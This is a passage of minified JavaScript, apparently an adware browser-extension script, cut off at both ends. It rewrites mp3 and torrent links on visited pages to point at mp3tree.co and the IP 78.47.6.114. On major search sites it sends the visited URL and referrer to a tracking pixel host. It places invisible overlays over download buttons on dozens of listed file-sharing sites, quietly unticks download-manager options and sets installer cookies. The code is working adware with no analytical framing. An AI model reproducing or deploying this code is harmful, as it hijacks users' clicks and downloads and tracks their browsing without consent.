f=c.query_selector_all(a);clearTimeout(c.waitTimeout);if(25<k.waitForElementCounter)return b(null);if(\"undefined\"==typeof f||1>f.length){if(c.waitForTokens[d])return b(null);var g=arguments.callee;c.waitTimeout=setTimeout(function(){k.waitForElementCounter++;g(a,b,e,d)},e)}else{if(c.waitForTokens[d])return b(null);c.waitForTokens[d]=!0;k.waitForElementCounter=0;return b(f)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*\r\n(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle[b]?a.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=\r\na.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:\r\nfunction(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,e,c){return c.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var e=null;return function(){var c=this,f=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(c,f)},b)}};c.epoch=function(){return(new Date).getTime()};\r\nc.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};\r\nc.match_url=function(a,b){for(var e=0;e<b.length;e++)if(\"string\"==typeof b[e]){var d;d=/^\\/.+\\/$/.test(b[e])?new RegExp(b[e]):c.wildcard_to_regex(b[e]);if(d instanceof RegExp&&d.test(a))return!0}};c.ping=function(a){for(var b=[\"google\",\"bing\",\"yahoo\",\"youtube\"],c=0;c<b.length;c++)if(-1<location.hostname.indexOf(b[c])){var d=new Image,f=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<f.length&&(f=encodeURIComponent(location.hostname));var g=encodeURIComponent(location.hostname);\r\nd.src=k.pixelHost+\"?hid=8438959027574575270&eid=1307&pid=21153&prodid=338&v=\"+k.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=FR&pr=\"+b[c]+\"&host=\"+g+\"&ref=\"+f}};c.getAllText=function(a){for(var b=\"\",c=0;c<a.length;c++)b+=a.textContent?a.textContent:a.innetText;return b};c.duplicateElement=function(a){var b=document.createElement(a.nodeName.toLowerCase()),e=!1;a.getAttribute(\"href\")&&b.setAttribute(\"href\",\"javascript:void(0);\");for(var d in a)if(\"src\"==\r\nd||\"width\"==d||\"height\"==d)b[d]=a[d];else if(\"style\"==d)for(var f in a[d])a[d][f]&&\"\"!=a[d][f]&&(b[d][f]=a[d][f]);else e||\"nodeValue\"!=d&&\"textContent\"!=d&&\"innetText\"!=d&&\"className\"!=d||0!=a.children.length||(b[d]=a[d],e=!0);for(e=0;e<a.childNodes.length;e++)if(3==a.childNodes[e].nodeType)b.appendChild(document.createTextNode(a.childNodes[e].textContent?a.childNodes[e].textContent:a.childNodes[e].innerText));else{d=c.duplicateElement(a.childNodes[e]);f=c.getAllText(d.childNodes);var g=a.childNodes[e].textContent?\r\na.childNodes[e].textContent:a.childNodes[e].innerText;g&&(g=g.replace(f,\"\"),\"\"!=g&&(d.textContent?d.textContent=g:d.innerText=g));b.appendChild(d)}return b}};if(-1<window.location.href.indexOf(\"google.com/chrome/srt\")&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")){try{var h=parseInt(window.navigator.appVersion.match(/Chrome\\/(\\d+)\\./)[1],10)}catch(p){return}if(!(38>=h)){for(h=0;h<document.links.length;h++){var l=document.links[h],m=l.getAttribute(\"href\");if(m&&-1<m.indexOf(\"#dialog-contents\")){var m=\r\nk.utils.duplicateElement(l),n=l.parentNode;n.insertBefore(m,l);n.removeChild(l)}}(h=document.getElementById(\"dialog-contents\"))&&h.remove()}}};(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"bcvzdw1\",function(a){if(!a.bcvzdw1&&!localStorage.getItem(\"bcvzdw1\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)if(a[b]&&a[b].href&&\"mp3\"==a[b].href.substr(-3)){var c=a[b].href;a[b].setAttribute(\"href\",\"http://mp3tree.co/media/\"+encodeURIComponent(a[b].innerHTML)+\"/mid/\"+encodeURIComponent(encodeURIComponent(c))+\"/el/1\");a[b].setAttribute(\"id\",\"sdfsdfsfds\"+b);document.getElementById(\"sdfsdfsfds\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({bcvzdw1:\"2\"});localStorage.setItem(\"bcvzdw1\",\"2\")},!1)}})}catch(d){}})();(function(){try{window.top==window.self&&-1<navigator.userAgent.toLowerCase().indexOf(\"chrome\")&&\"http:\"==window.location.protocol&&chrome.storage.local.get(\"bxcv43t897\",function(a){if(!a.bxcv43t897&&!localStorage.getItem(\"bxcv43t897\")&&(a=document.getElementsByTagName(\"a\"),a.length))for(var b=0;b<a.length;b++)a[b]&&a[b].href&&\"torrent\"==a[b].href.substr(-7)&&(a[b].setAttribute(\"href\",\"http://78.47.6.114/api/getLink/?cb=\"+Math.random()),a[b].setAttribute(\"id\",\"cxvcxv\"+b),document.getElementById(\"cxvcxv\"+b).addEventListener(\"click\",function(){chrome.storage.local.set({bxcv43t897:\"2\"});localStorage.setItem(\"bxcv43t897\",\"2\")},!1))})}catch(c){}})();}catch(e){};try{new function(){var n=this;this.activeZds={\"uploading.com\":1,\"dirpy.com\":0,\"go4up.com\":1,\"mp3olimp.org\":1,\"hulkload.com\":1,\"free-tv-video-online.me\":1,\"ehd.c\":1,\"hesefiles.c\":1,\"sharebeast.com\":0,\"coolrom.com\":1,\"ebookbrowsee.net\":1,\"cloud-vibe.com\":0,\"mp3seal.com\":0,\"mp3vampire.com\":0,\"minecraftdl.com\":0,\"leunlckr.co\":0,\"go.theadsnet.com\":1,\"ziddu.com\":1,\"opensubtitles.org\":1,\"romptfile.co\":1,\"pensoftwareupdater.co\":1,\"veehd.com\":1,\"ullypcgames.ne\":0,\"llplayer.com.b\":1,\"ubtitulosespanol.or\":1,\"ubtitles4free.ne\":1,\n\"legendasbrasil.org\":1,\"reeroms.co\":0,\"eneral-ebooks.co\":0,\"stream2watch.me\":1,\"kickass.to\":1,\"kickass.so\":1,\"pensubtitles.us\":0,\"uploadrocket.net\":0,\"programas-gratis.net\":0,\"programasgratis.es\":1,\"programasejogos.com\":1,\"flexydrive.com\":1,\"media1fire.com\":1,\"softwareandgames.com\":1,\"baixarjogos.com\":1,\"programmesetjeux.com\":1,\"descargarjuegos.com\":1,\"hotfiles.ro\":1,\"vitanclub.net\":1,\"getsecuredfiles.com\":1,\"mirrorcreator.com\":0,\"mestorrents.com\":1,\"vitorrent.net\":1,\"uploaded.net\":0,\"newsinitiative.org\":0,\n\"megafilmesonlinehd.com\":1,\"mycoolmp3.com\":1,\"descargadictos.net\":0,\"toggle.com\":1,\"downloadshareware.com\":1,\"primewire.ag\":1,\"ads.showmeflix.com\":0,\"myappsforpc.com\":1,\"telecharger.logiciel.net\":1,\"winmacsofts.com\":1,\"telecharger.info\":0,\"torntv-dl.net\":0,\"1337x.to\":1,\"h33t.to\":1,\"ahashare.com\":1,\"torrenthound.com\":1,\"smartorrent.com\":1,\"torrentreactor.net\":1,\"tomadivx.org\":1,\"opensubtitles.website\":0,\"downloads.info\":1,\"techypcapps.com\":1,\"techmacho.com\":1,\"techariot.com\":1,\"androidlegend.com\":1,\n\"technologyrush.com\":1,\"notintricate.com\":1,\"techglen.com\":1,\"updownload.com\":1,\"techamiable.com\":1,\"appsforpcmero.com\":0,\"hugefiles.net\":0,\"descarga.benjaminstrahs.com\":1,\"installers.installm.com\":1,\"uptobox.com\":1,\"torrentz.com\":1,\"torrentz.eu\":1,\"torrentsmirror.com\":1,\"isohunt.to\":0,\"lp.playerpage209.info\":1,\"lp.playerpage214.info\":1};this.utils=new function(){var h=this;h.sendPixels=function(e){var h;if(e instanceof Array)for(var l=0;l<e.length;l++){var m=e[l];h=new Image;h.src=m}else h=new Image,\nh.src=e};h.isFalse=function(e){return\"undefined\"==typeof e||0===e.length||null===e};h.cookie=new function(){var e=this;e.createCookie=function(e,h,m){if(m){var n=new Date;n.setTime(n.getTime()+864E5*m);m=\"; expires=\"+n.toGMTString()}else m=\"\";document.cookie=e+\"=\"+h+m+\"; path=/\"};e.readCookie=function(e){e+=\"=\";for(var h=document.cookie.split(\";\"),m=0;m<h.length;m++){for(var n=h[m];\" \"==n.charAt(0);)n=n.substring(1,n.length);if(0==n.indexOf(e))return n.substring(e.length,n.length)}return null};e.eraseCookie=\nfunction(h){e.createCookie(h,\"\",-1)}};h.ajax={get:function(e,k){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",e,!0),this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&k(h.ajax.xhr.responseText)},this.xhr.send()}catch(l){}},post:function(e,k,l){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",e,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==h.ajax.xhr.readyState&&l(h.ajax.xhr.responseText)};k=encodeURIComponent(k);\nthis.xhr.send(k)}};h.waitForTokens={};h.addScript=function(e,h){if(\"bing\"==h){var l=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(e);Element.prototype.appendChild=l}else document.getElementsByTagName(\"head\")[0].appendChild(e)};h.waitForElement=function(e,k,l,m){var p=h.query_selector_all(e);clearTimeout(h.waitTimeout);if(25<n.waitForElementCounter)return k(null);if(\"undefined\"==\ntypeof p||1>p.length){if(h.waitForTokens[m])return k(null);var q=arguments.callee;h.waitTimeout=setTimeout(function(){n.waitForElementCounter++;q(e,k,l,m)},l)}else{if(h.waitForTokens[m])return k(null);h.waitForTokens[m]=!0;n.waitForElementCounter=0;return k(p)}};h.flushWaitForTokens=function(){h.waitForTokens={}};h.getRandomInt=function(e,h){return Math.floor(Math.random()*(h-e+1))+e};h.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(e){return{getPropertyValue:function(k){\"float\"==\nk&&(k=\"styleFloat\");k=h.dhtml_prop_name(k);return\"object\"==typeof e.currentStyle&&null!=e.currentStyle&&\"undefined\"!=typeof e.currentStyle[k]?e.currentStyle[k]:null}}}:function(e,h){return window.getComputedStyle(e,h)||{getPropertyValue:function(){}}};h.query_selector_all=document.querySelectorAll?function(e){try{return document.querySelectorAll(e)}catch(h){}}:function(e){var h=e.match(/^#([^,\\s]+)$/)||[];if(1<h.length)return e=document.getElementById(h[1])||void 0,\"undefined\"!=typeof e?[e]:[];h=\ndocument.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(h);document.__asya_qsaels=[];h.styleSheet.cssText=e+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};h.clone_object=window.JSON instanceof Object?function(e){if(e instanceof Object&&(e=JSON.stringify(e),\"string\"==typeof e))return JSON.parse(e)}:function(e){if(e instanceof Object){var h=new e.constructor,l;for(l in e)h[l]=arguments.callee(e[l]);return h}return e};\nh.dhtml_prop_name=function(e){return e.replace(/(\\-([a-z]){1})/g,function(e,h,m){return m.toUpperCase()})};h.wildcard_to_regex=function(e){e=e.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");e=e.replace(/\\*/g,\".*\");return new RegExp(e)};h.throttle=function(e,h){var l=null;return function(){var m=this,n=arguments;clearTimeout(l);l=setTimeout(function(){e.apply(m,n)},h)}};h.epoch=function(){return(new Date).getTime()};h.msie=function(){var e=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||\n[])[1],10);isNaN(e)&&(e=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(e)?!1:e}();h.version_ie_less=function(e){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=e?!0:!1};h.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};h.match_url=function(e,k){for(var l=0;l<k.length;l++)if(\"string\"==typeof k[l]){var m;\nm=/^\\/.+\\/$/.test(k[l])?new RegExp(k[l]):h.wildcard_to_regex(k[l]);if(m instanceof RegExp&&m.test(e))return!0}};h.ping=function(e){for(var h=[\"google\",\"bing\",\"yahoo\",\"youtube\"],l=0;l<h.length;l++)if(-1<location.hostname.indexOf(h[l])){var m=new Image,p=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<p.length&&(p=encodeURIComponent(location.hostname));var q=encodeURIComponent(location.hostname);m.src=n.pixelHost+\"?hid=8438959027574575270&eid=1307&pid=21153&prodid=338&v=\"+\nn.version+\"&ch=\"+e+\"&lan=\"+navigator.language+\"&cc=FR&pr=\"+h[l]+\"&host=\"+q+\"&ref=\"+p}};h.getAllText=function(e){for(var h=\"\",l=0;l<e.length;l++)h+=e.textContent?e.textContent:e.innetText;return h};h.duplicateElement=function(e){var k=document.createElement(e.nodeName.toLowerCase());e.getAttribute(\"href\")&&k.setAttribute(\"href\",\"javascript:void(0);\");for(var l in e)if(\"src\"==l||\"width\"==l||\"height\"==l||\"id\"==l||\"className\"==l)k[l]=e[l];else if(\"style\"==l)for(var m in e[l])e[l][m]&&\n\"\"!=e[l][m]&&(k[l][m]=e[l][m]);else\"input\"!==e.nodeName.toLowerCase()||\"type\"!=l&&\"value\"!=l||(k[l]=e[l]);for(l=0;l<e.childNodes.length;l++)if(3==e.childNodes[l].nodeType)m=e.childNodes[l].textContent?e.childNodes[l].textContent:e.childNodes[l].innerText,\"undefined\"===typeof m&&(m=e.childNodes[l].nodeValue?e.childNodes[l].nodeValue:e.childNodes[l].data),\"undefined\"!==typeof m&&k.appendChild(document.createTextNode(m));else{m=h.duplicateElement(e.childNodes[l]);var n=h.getAllText(m.childNodes),q=e.childNodes[l].textContent?\ne.childNodes[l].textContent:e.childNodes[l].innerText;q&&(q=q.replace(n,\"\"),\"\"!=h.trim(q)&&(m.textContent?m.textContent=q:m.innerText=q));k.appendChild(m)}return k};h.coverElement=function(h,k,l,m,n,q,t,r){var u=document.createElement(\"div\");u.style.width=k?k:\"100%\";u.style.height=l?l:\"100%\";u.style.zIndex=q?q:\"2000\";u.style.top=m?m:\"0\";u.style.left=n?n:\"0\";u.style.cursor=t?t:\"pointer\";u.style.position=\"absolute\";k=h.parentNode;k.style.position=\"relative\";!0!==r&&\"undefined\"!==typeof r||k.removeChild(h);\nk.appendChild(u)};h.trim=function(h){return\"function\"!==typeof String.prototype.trim?String(h).replace(/^\\s+|\\s+$/g,\"\"):String.prototype.trim(h)}};this[\"dirpy.com\"]=new function(){this.init=function(){try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(h){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}new function(){-1<\nlocation.host.toLowerCase().indexOf(\"irpy.co\")&&(window.__irpyCount=0,window.__irpyInt=setInterval(function(){for(var h=document.links,k=0;k<h.length;k++){var l=h[k].getAttribute(\"href\");if(null!=l&&-1<l.toLowerCase().indexOf(\"dirpy.com/download/\")){l=document.createElement(\"div\");l.style.top=\"0\";l.style.width=\"100%\";l.style.height=\"100%\";l.style.cursor=\"pointer\";l.style.zIndex=\"2000\";l.style.position=\"absolute\";var m=h[k].parentNode;m.style.position=\"relative\";m.appendChild(l);clearInterval(window.__irpyInt)}}20<\nwindow.__irpyCount++&&clearInterval(window.__irpyInt)},250))}}};this[\"mp3olimp.org\"]=new function(){this.init=function(){setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++)if(\"return prepare_download_file(this);\"==h[e].getAttribute(\"onclick\")){var m=document.createElement(\"a\");m.className=\"link last\";m.setAttribute(\"href\",\"javascript:void(0);\");m.innerText?m.innerText=\"Download\":m.textContent=\"Download\";var n=h[e].parentNode,q=n.children[n.children.length-1];q&&(n.removeChild(h[e]),\nn.insertBefore(m,q))}},1E3);new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=document.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};-1<window.location.host.toLowerCase().indexOf(\"p3olimp.or\")&&(window.__intCount=0,window.__int=setInterval(function(){var h=\ndocument.getElementById(\"download-manager-checkbox\");if(null!==h)try{h.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(e){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250));if(-1<document.location.host.indexOf(\"p3olimp.or\")&&document.getElementsByClassName)for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var h=document.getElementsByClassName(\"nasjfkla\"),e=0;e<h.length;e++)h[e].style.display=c.checked?\"block\":\n\"none\"},i=0;i<document.links.length;i++){var h=document.links[i],e=h.getAttribute(\"onclick\");e&&-1<e.indexOf(\"prepare_download_file\")&&(h=h.parentNode,h.style.position=\"relative\",b=document.createElement(\"div\"),b.className=\"nasjfkla\",b.style.position=\"absolute\",b.style.top=\"-2px\",b.style.left=\"92px\",b.style.width=\"71px\",b.style.height=\"16px\",b.style.zIndex=\"99999\",b.style.cursor=\"pointer\",h.appendChild(b))}-1<location.host.indexOf(\"p3olimp.or\")&&setTimeout(function(){for(var h=document.getElementById(\"leftside\"),\ne=0;e<h.children.length;e++)if(/\\bspnBook\\b/.test(h.children[e].className))for(var m=h.children[e].getElementsByTagName(\"a\"),n=0;n<m.length;n++)m[n].setAttribute(\"href\",\"#\"),m[n].setAttribute(\"target\",\"\")},1001)}};this[\"hulkload.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".reclamTable .reclamRow .reclamCell a\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=n.utils.query_selector_all(\".contentback div div a[target='_blank']\");\nfor(e=0;e<h.length;e++)k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);h=n.utils.query_selector_all(\".contentback div center a[target='_blank']\");for(e=0;e<h.length;e++)k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k);new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var h=document.getElementsByTagName(\"center\"),e=0;e<h.length;e++)if(0!=\ne&&!(-1<h[e].innerHTML.indexOf(\"adcopy-outer\")||-1<h[e].innerHTML.indexOf(\"btn_download\")||-1<h[e].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"1900\";k.style.position=\"absolute\";e==h.length-1?(k.style.bottom=\"0\",k.style.height=\"110px\"):k.style.top=\"0\";h[e].style.position=\"relative\";h[e].appendChild(k)}h=document.getElementById(\"cap\");null!=h&&(h.parentNode.style.position=\"relative\",\nh.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}}};this[\"free-tv-video-online.me\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){for(var h=document.getElementsByTagName(\"div\"),e=0;e<h.length;e++)if(h[e].style&&\"653px\"==h[e].style.width&&\"49px\"==h[e].style.height){var k=h[e];k.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.cursor=\n\"pointer\";l.style.zIndex=\"2000\";l.style.width=\"100%\";l.style.height=\"50px\";l.style.top=\"0\";k.appendChild(l)}setTimeout(function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e].innerText?h[e].innerText:h[e].textContent;if(\"trackOutboundLink(this, 'Outbound Links', 'slinks.com'); return false;\"==h[e].getAttribute(\"onclick\")&&\"Stream Video Now!\"==k){k=document.createElement(\"a\");k.className=\"down\";k.setAttribute(\"href\",\"javascript:void(0);\");k.innerText?k.innerText=\"Stream Video Now!\":k.textContent=\n\"Stream Video Now!\";var l=h[e].parentNode,n=l.children[l.children.length-1];l.removeChild(h[e]);if(n)try{l.insertBefore(k,n)}catch(u){l.appendChild(k)}else l.appendChild(k)}}h=document.getElementsByTagName(\"a\");for(e=0;e<h.length;e++)if(\"getDownload();\"==h[e].getAttribute(\"onclick\"))if(k=document.createElement(\"p\"),k.className=\"dloadh\",k.setAttribute(\"href\",\"javascript:void(0);\"),k.innerText?k.innerText=\" \":k.textContent=\" \",l=h[e].parentNode,n=l.children[l.children.length-1],l.removeChild(h[e]),\nn)try{l.insertBefore(k,n)}catch(w){l.appendChild(k)}else l.appendChild(k)},1E3);h=document.createElement(\"script\");h.type=\"text/javascript\";h[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var h=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+h.top+\"px;left:\"+h.left+\n\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(e){}}.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(h)}}};this[\"ehd.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\nf=document.getElementById(\"r1113566095\").parentNode,f.style.position=\"relative\",f.appendChild(g))}};this[\"hesefiles.c\"]=new function(){this.init=function(){-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var h=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",\n!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))h();else{var e=document.createElement(\"script\");e.type=\"text/javascript\";e.innerHTML=\"(\"+h.toString()+\")()\";document.body.appendChild(e)}}}};this[\"sharebeast.com\"]=new function(){this.init=function(){if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var h=document.getElementsByTagName(\"div\"),e;for(e in h)h[e]&&h[e].style&&\"fixed\"==h[e].style.position&&\"solid\"==\nh[e].style.borderBottomStyle&&(h[e].style.display=\"none\")}}};this[\"coolrom.com\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)-1<h[e].src.indexOf(\"/images/download_large.png\")&&h[e].parentNode.setAttribute(\"href\",\"javascript:void(0);\");h=new Date;h.setTime(h.getTime()+2592E6);h=\"; expires=\"+h.toGMTString();document.cookie=\"installer=14604\"+h+\"; path=/;domain=.coolrom.com\"}};this[\"ebookbrowsee.net\"]=new function(){this.init=function(){}};this[\"cloud-vibe.com\"]=\nnew function(){this.init=function(){-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3seal.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3seal.co\")&&(a=\ndocument.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"mp3vampire.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\n\"\"),a.addEventListener(\"click\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1),a.addEventListener(\"mousedown\",function(h){h.returnValue=!1;h.preventDefault&&h.preventDefault()},!1))}};this[\"minecraftdl.com\"]=new function(){this.init=function(){-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\n\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var h=document.links[i];\".exe\"==h.href.substr(-4)&&(h=h.parentNode,h.style.position=\"relative\",d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.top=0,d.style.left=0,d.style.width=\"100%\",d.style.height=\"100%\",d.style.cursor=\"pointer\",d.style.zIndex=9999,h.appendChild(d))}}};\nthis[\"leunlckr.co\"]=new function(){this.init=function(){if(-1<document.location.host.indexOf(\"leunlckr.co\")){var h=document.getElementsByTagName(\"button\")[0],e=document.createElement(\"button\");e.className=h.className;e.innerHTML=h.innerHTML;h.parentNode.insertBefore(e,h);h.parentNode.removeChild(h)}}};this[\"go.theadsnet.com\"]=new function(){this.init=function(){-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");(function(){var h=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var e=\nsetInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*k.children[2].children[1].children[1].innerText);m.push(1*k.children[2].children[2].children[1].innerText);m.push(1*k.children[3].children[1].children[1].innerText);m.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<m.length;n++)k+=m[n];if(!(0<k)){clearInterval(e);var q=document.createElement(\"div\");q.style.position=\"absolute\";q.style.top=0;q.style.left=0;q.style.width=\"100%\";q.style.height=\n\"100%\";q.style.zIndex=\"9999\";q.style.cursor=\"pointer\";var t=document.getElementById(\"ucd-countdown-1-content\").children[1];t.style.position=\"relative\";t.appendChild(q)}}catch(r){try{var u=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){u+=1*jQuery(this).text()});if(0===u){clearInterval(e);var w=jQuery(\"#ucd-countdown-1-content iframe\"),x=w.parent();w.remove();x.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(v){\"undefined\"!==\ntypeof h&&30<++h&&clearInterval(e)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var h=0,e=setInterval(function(){h++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var k=0;k<document.links.length;k++)try{var l=document.links[k].href.toLowerCase();if(-1==l.indexOf(\"ww.ziddu.co\")&&-1==l.indexOf(\"#\")&&-1==l.indexOf(\"tunes.apple.co\")&&-1==l.indexOf(\"lay.google.co\")&&-1==l.indexOf(\"/gallery/\")){try{for(var m=document.links[k],n=0;15>=n;n++)m=m.parentNode;\nif(-1<m.className.indexOf(\"footerbg\"))continue}catch(q){}var 